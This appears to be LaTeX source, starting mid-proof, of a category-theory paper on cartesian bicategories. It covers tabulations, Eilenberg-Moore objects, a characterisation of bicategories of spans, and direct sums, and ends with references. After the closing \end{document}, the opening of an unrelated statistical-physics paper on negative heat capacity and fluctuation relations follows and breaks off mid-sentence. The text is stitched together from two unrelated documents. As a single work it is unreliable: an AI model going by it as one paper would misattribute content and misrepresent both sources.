\square(0,0)|almb|[T`XXA`T`XAA;(x,x,a)`H`XRA`(x,a,a)]
\morphism(125,250)|a|<250,0>[`;(\alpha,\beta,\gamma)]
\square(500,0)|amrb|[XXA`XA`XAA`XA;p_{1,3}`XRA`1_{XA}`p_{1,3}]
\morphism(625,250)|a|<250,0>[`;p_{1,3}]
\place(1375,250)[=]
\square(2000,0)|arrb|[T`XA`T`XA;(x,a)`1_T`1_{XA}`(x,a)]
\morphism(2125,250)|a|<250,0>[`;\kappa_{(x,a)}]
\morphism(2000,500)|l|/{@{->}@/_3em/}/<0,-500>[T`T;H]
\morphism(1750,250)|a|<200,0>[`;\epsilon_H]
\efig$$
So, with a mild abuse of notation, the unique solutions for $\alpha$ and
$\gamma$ are $1_x\epsilon_H$ and $1_a\epsilon_H$ respectively. This shows that
$\phi$ is necessarily the mate, under the adjunctions considered, of
$(1_x\epsilon_H,\psi,1_a\epsilon_H)$. Since $\mathbf{D}$ and $\mathbf{G}$
are essentially locally discrete, this suffices to
complete the claim that $K\dashv G$.
It only remains to show that the mate $rG(R)p^*{\,\s\to}\, R$ of the counit
$\mu$ is invertible. In the three middle squares of the diagram
$$\bfig
\morphism(0,500)|l|/{@{->}@/_3.5em/}/<0,-1500>[XA`XA;G(R)]
\square(0,0)|alrm|/<-`->`->`<-/[XA`X`XXA`XX;p^*`dA`d`p^*]
\morphism(125,250)|a|<250,0>[`;\tilde p^*_{d,1_A}]
\square(0,-500)|mlmm|/<-`->`->`<-/[XXA`XX`XAA`XA;p^*`XRA`XR`p^*]
\morphism(125,-250)|a|<250,0>[`;\tilde p^*_{XR,1_A}]
\square(0,-1000)|mlrb|/<-`->`->`->/[XAA`XA`XA`A;p^*`Xd^*`r`r]
\morphism(175,-750)|a|<150,0>[`;\simeq]
\square(500,-500)|amrb|[XX`X`XA`A;r`XR`R`r]
\morphism(625,-250)|a|<250,0>[`;r_{1_X,R}]
\morphism(500,500)|r|<500,-500>[X`X;1_X]
\morphism(1000,-500)|r|<-500,-500>[A`A;1_A]
\efig$$
the top two are invertible 2-cells by
Proposition 4.18 of \cite{ckww} while the lower one is the obvious invertible
2-cell constructed from $Xd^*p^*\iso1_{XA}$. The right square is an
invertible 2-cell by Proposition 4.17 of \cite{ckww}. This shows that the
mate $rG(R)p^*{\,\s\to}\, R$ of $\mu$ is
invertible.
\frp
\rmk \label{unit} It now follows that the unit of the adjunction $K\dashv G$
is given (in notation suppressing $\otimes$) by:
$$\bfig
\qtriangle(1500,1000)[T`TT`TTT;d`d_3`dT]
\dtriangle(1500,0)/<-`->`->/[TTT`T`TT;d_3`Td^*`d]
\morphism(1500,1500)|l|<0,-1500>[T`T;H]
\morphism(2000,1000)|l|<0,-500>[TTT`TTT;HHH]
\morphism(2000,1000)|r|/{@{->}@/^3em/}/<0,-500>[TTT`TTT;THT]
\morphism(1750,1350)|a|<150,0>[`;\simeq]
\morphism(1550,750)|m|<175,0>[`;\tilde d_3]
\morphism(2050,750)|m|<225,0>[`;\epsilon H\epsilon]
\morphism(1750,150)|a|<150,0>[`;\simeq]
\efig$$
where the $d_3$ collectively denote 3-fold diagonalization $(1,1,1)$ in $\mathbf{G}$.
The top triangle is a canonical isomorphism while the lower triangle
is the mate of the canonical isomorphism $(T\otimes d)d{\scalefactor{0.5} \to^{\simeq}}d_3$
and is itself invertible, by separability of $T$.
\eth
Before turning to the question of an adjunction $J\dashv F$, we note:
\lem\label{maplikeanm}
In a cartesian bicategory in which Maps are Comonadic,
if $gF\cong h$ with $g$ and $h$ maps, then $F$ is also a map.
\eth
\prf
By Theorem 3.11 of \cite{ww} it suffices to show that $F$ is
a comonoid homomorphism, which is to show that the
canonical 2-cells $\tilde t_F{\kern -.25em}:{\kern -.25em} tF{\,\s\to}\, t$ and $\tilde d_F{\kern -.25em}:{\kern -.25em} dF{\,\s\to}\,(F\otimes F)d$
are invertible. For the first we have:
$$tF\cong tgF\cong th\cong t$$
Simple diagrams show that we do get the right isomorphism
in this case and also for the next:
$$(g\otimes g)(dF)\cong dgF\cong dh\cong(h\otimes h)d\cong (g\otimes g)(F\otimes F)d$$
which gives $dF\cong(F\otimes F)d$ since the map $g\otimes g$ reflects
isomorphisms.
\frp
\thm\label{emasbm} If $\mathbf{B}$ is a cartesian bicategory which has
Eilenberg-Moore objects for Comonads and for which Maps are Comonadic
then $\mathbf{B}$ has Eilenberg-Moore objects for Comonads as Seen by $\mathbf{M}$,
which is to say that $J{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{D}$ has a right adjoint. Moreover, the counit
for the adjunction, say $JF{\,\s\to}\, 1_{\mathbf{D}}$, necessarily having components
of the form $\gamma{\kern -.25em}:{\kern -.25em} g{\,\s\to}\, Gg$ with $g$ a map, has $gg^*{\,\s\to}\, G$ invertible.
\eth
\prf
It suffices to show that the adjunction $I\dashv E{\kern -.25em}:{\kern -.25em}\mathbf{C}{\,\s\to}\,\mathbf{B}$
restricts to $J\dashv F{\kern -.25em}:{\kern -.25em}\mathbf{D}{\,\s\to}\,\mathbf{M}$. For this it suffices to show that,
given $(h,\theta){\kern -.25em}:{\kern -.25em} JT{\,\s\to}\,(A,G)$, the $F{\kern -.25em}:{\kern -.25em} T{\,\s\to}\, A_G$ with $gF\cong h$
which can be found using $I\dashv E$ has $F$ a map. This follows from
Lemma \ref{maplikeanm}.
\frp
\thm\label{tabulation} A cartesian bicategory which has Eilenberg-Moore
objects for Comonads and for which Maps are Comonadic has tabulation in
the sense that the inclusion $\iota{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{G}$ has a right adjoint $\tau$
and the counit components $\omega_R{\kern -.25em}:{\kern -.25em} v_R{\,\s\to}\, Ru_R$ as in (\ref{tabcounit})
have the property that the mates $v_Ru^*_R{\,\s\to}\, R$, with respect to the
adjunctions $u_R\dashv u^*_R$, are invertible.
\eth
\prf
Using Theorems \ref{G(R)} and \ref{emasbm} we can construct the adjunction
$\iota\dashv\tau$ by composing $J\dashv F$ with $K\dashv G$. Moreover, the
counit for $\iota\dashv\tau$ is the pasting composite:
$$\bfig
\Ctriangle(0,0)|lmb|/<-`->`->/<500,250>[X\otimes A`T`X\otimes A;(u,v)`G(R)`(u,v)]
\morphism(0,250)|l|/{@{->}@/^4.0em/}/<1000,250>[T`X;u]
\morphism(0,250)|l|/{@{->}@/_4.0em/}/<1000,-250>[T`A;v]
\morphism(300,160)|m|<0,180>[`;\gamma]
\square(500,0)|amrb|<500,500>[X\otimes A`X`X\otimes A`A;p`G(R)`R`r]
\morphism(650,250)|m|<200,0>[`;\mu]
\efig$$
where the square is the counit for $K\dashv G$; and the triangle, the counit
for $J\dashv F$, is an Eilenberg-Moore coalgebra for the comonad $G(R)$.
The arrow component of the Eilenberg-Moore coalgebra is necessarily of
the form $(u,v)$, where $u$ and $v$ are maps, and it also follows that
we have $(u,v)(u,v)^*\cong G(R)$. Thus we have
$$vu^*\cong r(u,v)(p(u,v))^*\cong r(u,v)(u,v)^*p^*\cong rG(R)p^*\cong R$$
where the first two isomorphisms are trivial, the third arises from the
invertibility of the mate of $\gamma$ as an Eilenberg-Moore structure,
and the fourth is invertibility of $\mu$, as in Theorem \ref{G(R)}.
\frp
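In the motivating case $\mathbf{B}=\mathrm{Span}\,{\cal E}$ the tabulation of a span
is, as one would hope, its vertex: for $R=(u,T,v){\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ one may take
$\tau R=T$ with $u_R=u$ and $v_R=v$, and then
$$v_Ru^*_R=(1_T,T,v)(u,T,1_T)\cong(u,T,v)=R,$$
the composite span being computed by pulling back $1_T$ along $1_T$.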
\thm\label{mapbhaspb}
For a cartesian bicategory $\mathbf{B}$ with Eilenberg-Moore objects for
Comonads and for which Maps are Comonadic, $\mathrm{Map}\mathbf{B}$ has pullbacks
satisfying the Beck condition (meaning that for a pullback square
\begin{equation}\label{beckforpb}
\bfig
\square(0,0)[P`M`N`A;r`p`b`a]
\morphism(200,250)<100,0>[`;\simeq]
\efig
\end{equation}
the mate $pr^*{\,\s\to}\, a^*b$ of $ap\cong br$ in $\mathbf{B}$,
with respect to the adjunctions $r\dashv r^*$ and $a\dashv a^*$,
is invertible).
\eth
\prf
Given the cospan $a{\kern -.25em}:{\kern -.25em} N{\,\s\to}\, A\,{\s\toleft}\, M{\kern -.25em}:{\kern -.25em} b$ in $\mathrm{Map}\mathbf{B}$, let
$P$ together with $(r,\sigma,p)$ be a tabulation
for $a^*b{\kern -.25em}:{\kern -.25em} M{\,\s\to}\, N$. Then $pr^*{\,\s\to}\, a^*b$, the mate of
$\sigma{\kern -.25em}:{\kern -.25em} p{\,\s\to}\, a^*br$ with respect to $r\dashv r^*$, is invertible
by Theorem \ref{tabulation}. We have also $ap{\,\s\to}\, br$, the mate of
$\sigma{\kern -.25em}:{\kern -.25em} p{\,\s\to}\, a^*br$ with respect to $a\dashv a^*$. Since $A$
is discrete, $ap{\,\s\to}\, br$ is also invertible and is the only 2-cell
between the composite maps in question. If we have also
$u{\kern -.25em}:{\kern -.25em} N\,{\s\toleft}\, T{\,\s\to}\, M{\kern -.25em}:{\kern -.25em} v$, for maps $u$ and $v$ with $au\cong bv$, then the
mate $u{\,\s\to}\, a^*bv$ ensures that the span $u{\kern -.25em}:{\kern -.25em} N\,{\s\toleft}\, T{\,\s\to}\, M{\kern -.25em}:{\kern -.25em} v$ factors
through $P$ by an essentially unique map $w{\kern -.25em}:{\kern -.25em} T{\,\s\to}\, P$ with
$pw\cong u$ and $rw\cong v$.
\frp
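The Beck condition of Theorem \ref{mapbhaspb} is transparent in
$\mathrm{Span}\,{\cal E}$: for a pullback square as in (\ref{beckforpb}) the
composite $a^*b{\kern -.25em}:{\kern -.25em} M{\,\s\to}\, N$ is, by the very definition of span
composition, computed by that pullback, so that
$$pr^*\cong(r,P,p)\cong a^*b,$$
both composites being the span with vertex $P$.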
\prp\label{tabonadic} In a cartesian bicategory with
Eilenberg-Moore objects for Comonads and for which Maps are Comonadic,
every span of maps $x{\kern -.25em}:{\kern -.25em} X\,{\s\toleft}\, S{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} a$ gives rise to the following
tabulation diagram:
$$\bfig
\Ctriangle(0,0)|lmb|/<-`->`->/<500,250>[X`S`A;x`ax^*`a]
\morphism(300,160)|m|<0,180>[`;a\eta_x]
\efig$$
\eth
\prf A general tabulation counit $\omega_R{\kern -.25em}:{\kern -.25em} v_R{\,\s\to}\, Ru_R$ is given in terms
of the Eilenberg-Moore coalgebra for the comonad $(u,v)(u,v)^*$ and
necessarily $(u,v)(u,v)^*\cong G(R)$. It follows that for $R=ax^*$, it
suffices to show that $G(ax^*)\cong (x,a)(x,a)^*$.
Consider the diagram (with $\otimes$ suppressed):
$$\bfig
\Atriangle(0,0)|bba|/->`->`/[XSA`XXA`XAA;XxA`XaA`]
\Vtriangle(0,500)|mmm|/`->`->/[SA`XS`XSA;`(x,S)A`X(S,a)]
\Atriangle(0,1000)|lrm|/->`->`/[S`SA`XS;(S,a)`(x,S)`]
\Ctriangle(-500,0)|lml|/->``->/[SA`XA`XXA;xA``dA]
\Dtriangle(1000,0)|mrr|/`->`->/[XS`XA`XAA;`Xa`Xd]
\morphism(500,1500)|l|/{@{->}@/_3em/}/<-1000,-1000>[S`XA;(x,a)]
\morphism(500,1500)|r|/{@{->}@/^3em/}/<1000,-1000>[S`XA;(x,a)]
\efig$$
The comonad $G(ax^*)$ can be read, from left to right, along the
`W' shape of the lower edge as $G(ax^*)\cong Xd^*.XaA.Xx^*A.dA$.
But each of the squares in the diagram is a (product-absolute) pullback
so that with Proposition \ref{mapbhaspb} at hand we can continue:
$$Xd^*.XaA.Xx^*A.dA\cong Xa.X(S,a)^*.(x,S)A.x^*A\cong%
Xa.(x,S).(S,a)^*. x^*A\cong (x,a)(x,a)^*$$
as required.
\frp
\section{Characterization of Bicategories of Spans}\label{charspan}
\subsection{}\label{Cfun}
If $\mathbf{B}$ is a cartesian bicategory with $\mathrm{Map}\mathbf{B}$ essentially locally
discrete then each slice $\mathrm{Map}\mathbf{B}/(X\otimes A)$
is also essentially locally discrete and we can write
$\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A)$
for the categories obtained by taking the quotients of the equivalence
relations comprising the hom categories of the $\mathrm{Map}\mathbf{B}/(X\otimes A)$.
Then we can construct
functors $C_{X,A}{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A){\,\s\to}\,\mathbf{B}(X,A)$, where for
an arrow in $\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A)$ as shown,
$$\bfig
\Ctriangle(0,0)|lml|/->`->`<-/[M`A`N;a`h`b]
\Dtriangle(500,0)|mrr|/->`->`<-/[M`X`N;h`x`y]
\efig$$
we define $C(y,N,b)=by^*$ and
$C(h){\kern -.25em}:{\kern -.25em} ax^*=(bh)(yh)^*\cong bhh^*y^*\to^{b\epsilon_hy^*} by^*$.
If $\mathrm{Map}\mathbf{B}$ is known to have pullbacks then the
$\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A)$ become the hom-categories for a
bicategory $\mathrm{Span}\,\mathrm{Map}\mathbf{B}$ and we can consider whether the
$C_{X,A}$ provide the effects on homs for an identity-on-objects
pseudofunctor $C{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}{\,\s\to}\,\mathbf{B}$. Consider
\begin{equation}\label{beck}
\bfig
\Atriangle(0,0)/->`->`/[N`Y`A;y`b`]
\Vtriangle(500,0)/`->`->/[N`M`A;``]
\Atriangle(1000,0)/->`->`/[M`A`X;a`x`]
\Atriangle(500,500)/->`->`/[P`N`M;p`r`]
\efig
\end{equation}
where the square is a pullback. In somewhat
abbreviated notation, what is needed further are coherent,
invertible 2-cells $\widetilde C{\kern -.25em}:{\kern -.25em} CN.CM{\,\s\to}\, C(NM)=CP$,
for each composable pair of spans $M$, $N$, and
coherent, invertible 2-cells $C^\circ{\kern -.25em}:{\kern -.25em} 1_A{\,\s\to}\, C(1_A)$,
for each object $A$.
Since the identity span on $A$ is $(1_A,A,1_A)$,
and $C(1_A)=1_A.1^*_A\iso1_A.1_A\iso1_A$, we take
the inverse of this composite for $C^\circ$. To give the
$\widetilde C$ though is to give 2-cells
$yb^*ax^*{\,\s\to}\, ypr^*x^*$ and since spans of the form
$(1_N,N,b)$ and $(a,M,1_M)$ arise as special cases, it is
easy to verify that to give the $\widetilde C$ it is
necessary and sufficient to give coherent, invertible 2-cells
$b^*a{\,\s\to}\, pr^*$ for each pullback square in $\mathrm{Map}\mathbf{B}$. The inverse
of such a 2-cell $pr^*{\,\s\to}\, b^*a$ is the mate of a 2-cell
$bp{\,\s\to}\, ar$. But by discreteness a 2-cell
$bp{\,\s\to}\, ar$ must be essentially an identity. Thus, definability
of $\widetilde C$ is equivalent to the invertibility in $\mathbf{B}$
of the mate $pr^*{\,\s\to}\, b^*a$ of the identity $bp{\,\s\to}\, ar$, for each
pullback square as displayed in (\ref{beck}). In short,
if $\mathrm{Map}\mathbf{B}$ has pullbacks and these satisfy the Beck condition
as in Proposition \ref{mapbhaspb}
then we have a canonical pseudofunctor $C{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}{\,\s\to}\,\mathbf{B}$.
\thm\label{spanmain}
For a bicategory $\mathbf{B}$ the following are equivalent:
\begin{enumerate}[$i)$]
\item There is a biequivalence $\mathbf{B}\simeq\mathrm{Span}\,{\cal E}$,
for ${\cal E}$ a category with finite limits;
\item The bicategory $\mathbf{B}$ is cartesian, each comonad has an
Eilenberg-Moore object, and every map is comonadic.
\item The bicategory $\mathrm{Map}\mathbf{B}$ is an essentially locally
discrete bicategory with finite limits, satisfying in $\mathbf{B}$
the Beck condition for pullbacks of maps, and the
canonical $$C{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}{\,\s\to}\,\mathbf{B}$$ is a
biequivalence of bicategories.
\end{enumerate}
\eth
\prf
That $i)$ implies $ii)$ follows from our discussion in
the Introduction. That $iii)$ implies $i)$
is trivial so we show that $ii)$ implies $iii)$.
We have already observed in Theorem \ref{odibld} that,
for $\mathbf{B}$ cartesian with every object discrete,
$\mathrm{Map}\mathbf{B}$ is essentially locally discrete and we have seen
by Propositions \ref{mcifro} and \ref{mcisep} that,
in a cartesian bicategory in which Maps are Comonadic, every
object is discrete.
In Theorem~\ref{mapbhaspb} we have seen that, for $\mathbf{B}$ satisfying
the conditions of $ii)$, $\mathrm{Map}\mathbf{B}$ has pullbacks, and hence all
finite limits and, in $\mathbf{B}$ the Beck condition holds for pullbacks.
Therefore we have the canonical pseudofunctor $C{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}{\,\s\to}\,\mathbf{B}$
developed in \ref{Cfun}. To complete the proof it suffices to show that
the $C_{X,A}{\kern -.25em}:{\kern -.25em}\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A){\,\s\to}\,\mathbf{B}(X,A)$ are equivalences of categories.
Define functors $F_{X,A}{\kern -.25em}:{\kern -.25em}\mathbf{B}(X,A){\,\s\to}\,\mathrm{Span}\,\mathrm{Map}\mathbf{B}(X,A)$
by $F(R)=F_{X,A}(R)=(u,\tau R,v)$ where
$$\bfig
\Ctriangle/<-`->`->/<500,250>[X`\tau R`A;u`R`v]
\morphism(200,250)|m|<200,0>[`;\omega]
\efig$$
is the $R$-component of the counit for
$\iota\dashv\tau{\kern -.25em}:{\kern -.25em}\mathbf{G}{\,\s\to}\,\mathrm{Map}\mathbf{B}$. For a 2-cell
$\alpha{\kern -.25em}:{\kern -.25em} R{\,\s\to}\, R'$ we define $F(\alpha)$ to be
the essentially unique map satisfying
$$\bfig
\morphism(-500,500)|m|[\tau R`\tau R';F(\alpha)]
\Ctriangle(0,0)|rrr|/<-`->`->/[X`\tau R'`A;u'`R'`v']
\morphism(175,400)|a|<150,0>[`;\omega']
\morphism(-500,500)|l|<1000,500>[\tau R`X;u]
\morphism(-500,500)|l|<1000,-500>[\tau R`A;v]
\place(750,500)[=]
\Ctriangle(1000,0)/<-``->/[X`\tau R`A;u``v]
\morphism(1500,1000)|l|/{@{->}@/_1em/}/<0,-1000>[X`A;R]
\morphism(1500,1000)|r|/{@{->}@/^1.5em/}/<0,-1000>[X`A;R']
\morphism(1150,400)|a|<150,0>[`;\omega]
\morphism(1450,400)|a|<150,0>[`;\alpha]
\efig$$
(We remark that essential uniqueness here means that
$F(\alpha)$ is determined to within unique invertible 2-cell.)
Since $\omega{\kern -.25em}:{\kern -.25em} v{\,\s\to}\, Ru$ has mate $vu^*{\,\s\to}\, R$ invertible,
because $(v,\tau R,u)$ is a tabulation of $R$,
it follows that we have a natural isomorphism
$CFR{\,\s\to}\, R$. On the other hand, starting with a span
$(x,S,a)$ from $X$ to $A$ we have as a consequence of
Theorem \ref{tabonadic} that $(x,S,a)$ is part of a
tabulation of $ax^*{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$. It follows that we have a natural
isomorphism $(x,S,a){\,\s\to}\, FC(x,S,a)$, which completes the demonstration
that $C_{X,A}$ and $F_{X,A}$ are inverse equivalences.
\frp
\section{Direct sums in bicategories of spans}
In the previous section we gave a characterization of those (cartesian)
bicategories of the form $\mathrm{Span}\,{\cal E}$ for a category ${\cal E}$ with finite
limits. In this final section we give a refinement, showing that $\mathrm{Span}\,{\cal E}$
has direct sums if and only if the original category ${\cal E}$ is lextensive \cite{ext}.
Direct sums are of course understood in the bicategorical sense. A {\em zero object}
in a bicategory is an object which is both initial and terminal. In a bicategory with
finite products and finite coproducts in which the initial object is also terminal
there is a canonical induced arrow $X+Y\to X\times Y$, and we say that the
bicategory has {\em direct sums} when this map is an equivalence.
\begin{remark}
Just as in the case of ordinary categories, the existence of direct sums gives rise
to a calculus of matrices. A morphism $X_1+\ldots+X_m\to Y_1+\ldots+Y_n$
can be represented by an $m\times n$ matrix of morphisms between the summands,
and composition can be represented by matrix multiplication.
\end{remark}
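Concretely (a sketch; the component notation is not fixed in the text): writing
$R_{ij}$ for the component $X_i\to Y_j$ of a morphism
$R:X_1+\ldots+X_m\to Y_1+\ldots+Y_n$, the composite with
$S:Y_1+\ldots+Y_n\to Z_1+\ldots+Z_p$ has components
$$(SR)_{ik}\simeq\sum_{j=1}^{n}S_{jk}R_{ij},$$
where the sum on the right denotes the local coproduct of 1-cells
provided by the direct sums.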
\thm
Let ${\cal E}$ be a category with finite limits, and $\mathbf{B}=\mathrm{Span}\,{\cal E}$. Then the
following are equivalent:
\begin{enumerate}[$i)$]
\item $\mathbf{B}$ has direct sums;
\item $\mathbf{B}$ has finite coproducts;
\item $\mathbf{B}$ has finite products;
\item ${\cal E}$ is lextensive.
\end{enumerate}
\eth
\prf
$[i)\Longrightarrow$ $ii)]$ is trivial.
$[ii)\Longleftrightarrow$ $iii)]$ follows from the fact that $\mathbf{B}{^\mathrm{op}}$ is
biequivalent to $\mathbf{B}$.
$[ii)\Longrightarrow$ $iv)]$
Suppose that $\mathbf{B}$
has finite coproducts, and write $0$ for the initial object and $+$ for the coproducts.
For every object $X$ there is a unique span $0\,{\s\toleft}\, D{\,\s\to}\, X$. By uniqueness, any
map into $D$ must be invertible, and any two such with the same domain must
be equal. Thus when we compose the span with its opposite, as in
$0\,{\s\toleft}\, D{\,\s\to}\, X\,{\s\toleft}\, D{\,\s\to}\, 0$, the resulting span is just $0\,{\s\toleft}\, D{\,\s\to}\, 0$. Now by the
universal property of $0$ once again, this must just be $0\,{\s\toleft}\, 0{\,\s\to}\, 0$, and so
$D\cong 0$, and our unique span $0\to X$ is a map.
Clearly coproducts of maps are maps, and so the coproduct injections
$X+0\to X+Y$ and $0+Y\to X+Y$ are also maps. Thus the coproducts in $\mathbf{B}$
will restrict to ${\cal E}$ provided that the codiagonal $u{\kern -.25em}:{\kern -.25em} X+X\,{\s\toleft}\, E {\,\s\to}\, X{\kern -.25em}:{\kern -.25em} v$ is a map for
all objects $X$. Now the fact that the codiagonal composed with the first injection
$i:X\to X+X$ is the identity tells us that we have a diagram as on the left below
$$\xymatrix @!R=1pc @!C=1pc {
&& X \ar[dr]_{i'} \ar@{=}[dl] \ar@/^2pc/[ddrr]^{1} && &
&& X \ar[dr]_{i'} \ar@{=}[dl] \ar@/^2pc/[ddrr]^{i} \\
& X \ar[dr]^{i} \ar@{=}[dl] && E \ar[dl]_{u} \ar[dr]_{v} & &
& X \ar[dr]^{i} \ar@{=}[dl] && E \ar[dl]_{u} \ar[dr]_{u} \\
X && X+X && X & X && X+X && X+X }$$
in which the square is a pullback; but then the diagram on the right
shows that the composite of $u{\kern -.25em}:{\kern -.25em} X+X\,{\s\toleft}\, E{\,\s\to}\, X+X{\kern -.25em}:{\kern -.25em} u$ with the injection
$i:X\to X+X$ is just $i$. Similarly its composite with the other injection
$j:X\to X+X$ is $j$, and so $u{\kern -.25em}:{\kern -.25em} X+X\,{\s\toleft}\, E{\,\s\to}\, X+X{\kern -.25em}:{\kern -.25em} u$ is the identity.
This proves that the codiagonal is indeed a map, and so that ${\cal E}$ has finite
coproducts; we have already assumed that it has finite limits. To see that ${\cal E}$
is lextensive observe that we have equivalences
$${\cal E}/(X+Y)\simeq \mathbf{B}(X+Y,1) \simeq \mathbf{B}(X,1)\times\mathbf{B}(Y,1)\simeq {\cal E}/X\times {\cal E}/Y.$$
$[iv)\Longrightarrow$ $i)]$
Suppose that ${\cal E}$ is lextensive. Then in particular, it is distributive, so that
$(X+Y)\times Z\cong X\times Z+Y\times Z$, and
we have
\begin{align*}
\mathbf{B}(X+Y,Z) &\simeq {\cal E}/\bigl((X+Y)\times Z\bigr) \simeq {\cal E}/(X\times Z+Y\times Z) \\
&\simeq {\cal E}/(X\times Z)\times {\cal E}/(Y\times Z) \simeq \mathbf{B}(X,Z)\times\mathbf{B}(Y,Z)
\end{align*}
which shows that $X+Y$ is the coproduct in $\mathbf{B}$; but a similar argument shows
that it is also the product.
\frp
\rmk
The implication $iv)\Rightarrow i)$ was proved in \cite[Section~3]{SP07}.
\eth
\rmk
The equivalence $ii)\Leftrightarrow iv)$ can be seen as a special case of a
more general result \cite{HS} characterizing colimits in ${\cal E}$ which are also (bicategorical) colimits in $\mathrm{Span}\,{\cal E}$.
\eth
\rmk
There is a corresponding result involving partial maps in lextensive categories,
although the situation there is more complicated as one does not have direct
sums but only a weakened relationship between products and coproducts, and
a similarly weakened calculus of matrices. See \cite[Section~2]{restiii}.
\eth
There is also a nullary version of the theorem. We simply recall that an initial object in a
category ${\cal E}$ is said to be {\em strict}, if any morphism into it is invertible, and
then leave the proof to the reader. Once again the equivalence $ii)\Leftrightarrow iv)$
is a special case of \cite{HS}.
\thm
Let ${\cal E}$ be a category with finite limits, and $\mathbf{B}=\mathrm{Span}\,{\cal E}$. Then the
following are equivalent:
\begin{enumerate}[$i)$]
\item $\mathbf{B}$ has a zero object;
\item $\mathbf{B}$ has an initial object;
\item $\mathbf{B}$ has a terminal object;
\item ${\cal E}$ has a strict initial object.
\end{enumerate}
\eth
\references
\bibitem[CKWW]{ckww} A. Carboni, G.M. Kelly, R.F.C. Walters, and R.J. Wood.
Cartesian bicategories II, {\em Theory Appl. Categ.\/} 19 (2008), 93--124.
\bibitem[CLW]{ext} A. Carboni, Stephen Lack, and R.F.C. Walters.
Introduction to extensive and distributive categories. {\em J. Pure Appl. Algebra\/}
84 (1993), 145--158.
\bibitem[C\&W]{caw}
A. Carboni and R.F.C. Walters. Cartesian bicategories. I. {\em J. Pure
Appl. Algebra\/} 49 (1987), 11--32.
\bibitem[C\&L]{restiii}
J.R.B. Cockett and Stephen Lack. Restriction categories III: colimits, partial limits, and
extensivity, {\em Math. Struct. in Comp. Science\/} 17 (2007), 775--817.
\bibitem[LSW]{lsw} I. L\'opez Franco, R. Street, and R.J. Wood,
Duals Invert, {\em Applied Categorical Structures\/}, to appear.
\bibitem[H\&S]{HS}
T. Heindel and P. Soboci\'nski, Van Kampen colimits as bicolimits in Span,
{\em Lecture Notes in Computer Science,\/} (CALCO 2009), 5728 (2009), 335--349.
\bibitem[P\&S]{SP07}
Elango Panchadcharam and Ross Street, Mackey functors on compact closed categories, {\em J. Homotopy and Related Structures\/} 2 (2007), 261--293.
\bibitem[ST]{ftm}
R. Street. The formal theory of monads, {\em J. Pure Appl. Algebra\/} 2 (1972), 149--168.
\bibitem[W\&W]{ww} R.F.C. Walters and R.J. Wood.
Frobenius objects in cartesian bicategories, {\em Theory Appl. Categ.\/}
20 (2008), 25--47.
\endreferences
\end{document}
\section{Introduction}
According to the well-known fluctuation relation:
\begin{equation}\label{can.cfr}
C=k_{B}\beta^{2}\left\langle \delta U^{2}\right\rangle
\end{equation}
between the heat capacity $C$ and the energy fluctuations
$\left\langle \delta U^{2}\right\rangle $, the heat capacity should
be \textit{nonnegative}. However, such a conclusion is only an
illusion. Since the first theoretical demonstration about the
existence of macrostates with negative heat capacities $C<0$ by
Lynden-Bell in the astrophysical context \cite{Lynden}, this anomaly
has been observed in several systems
\cite{moretto,Dagostino,grona,Lyn2,pad,Lyn3,gro1}. The fluctuation relation (\ref{can.cfr})
directly follows from the consideration of the Gibbs' canonical
ensemble:
\begin{equation}
dp_{c}\left( U\left\vert \beta\right. \right) =\frac{1}{Z\left(
\beta\right) }\exp\left( -\beta U\right) \Omega\left( U\right)
dU,
\label{can}%
\end{equation}
which accounts for the equilibrium thermodynamic properties of a
system in thermal contact with a heat bath at constant temperature
$T$ when other thermodynamical variables like the system volume $V$
or a magnetic field $H$ are kept fixed, where $\beta=1/k_{B}T$. As
elsewhere shown \cite{gro1,Dauxois}, macrostates with $C<0$ can
exist within the microcanonical description of a given system, but
these states are \textit{thermodynamically unstable} under the
external influence imposed on the system within the Gibbs' canonical
ensemble.
A suitable extension of this standard result has been recently
derived \cite{vel-unc}:
\begin{equation}
C=k_{B}\beta^{2}\left\langle \delta U^{2}\right\rangle
+C\left\langle \delta\beta^{\omega
}\delta U\right\rangle , \label{unc}%
\end{equation}
which considers a \textit{system-surroundings} equilibrium situation
where the inverse temperature $\beta^{\omega }$ of a given
thermostat exhibits correlated fluctuations with the total energy
$U$ of the system under study as a consequence of the underlying
thermodynamic interaction. This last generalization differs from the
canonical equilibrium situation in the fact that the internal
thermodynamical state of the thermostat can be affected by the
presence of the system under study, constituting in this way a more
general framework than the usual canonical $\left(
\delta\beta^{\omega }=0\right) $ and microcanonical ensembles
$\left( \delta U=0\right) $.
The new fluctuation relation (\ref{unc}) defines a criterion capable
of detecting the presence of a regime with $C<0$ in the
microcanonical caloric curve $1/T\left( U\right) =\partial S\left(
U\right) /\partial U$ of the system through the correlated
fluctuations of the inverse temperature $\beta^{\omega}$ and the
energy $U$\ of the system itself. In fact, it asserts that
macrostates with $C<0$ are thermodynamically stable provided that
the influence of the thermostat obeys the inequality $\left\langle
\delta \beta^{\omega}\delta U\right\rangle >1$. Consequently, any
attempt to impose the canonical conditions
$\delta\beta^{\omega}\rightarrow0$ leads to very large energy
fluctuations $\delta U\rightarrow\infty$ that induce the
thermodynamic instability of such anomalous macrostates.
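Indeed, rearranging Eq.(\ref{unc}) makes this criterion explicit:
\begin{equation}
C\left( 1-\left\langle \delta\beta^{\omega}\delta U\right\rangle \right)
=k_{B}\beta^{2}\left\langle \delta U^{2}\right\rangle \geq0,
\end{equation}
so that a macrostate with $C<0$ is only compatible with $\left\langle
\delta\beta^{\omega}\delta U\right\rangle >1$, while the canonical case
$\left\langle \delta\beta^{\omega}\delta U\right\rangle =0$ recovers the
nonnegativity implied by Eq.(\ref{can.cfr}).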
As already discussed in a previous work \cite{vel.geo}, the
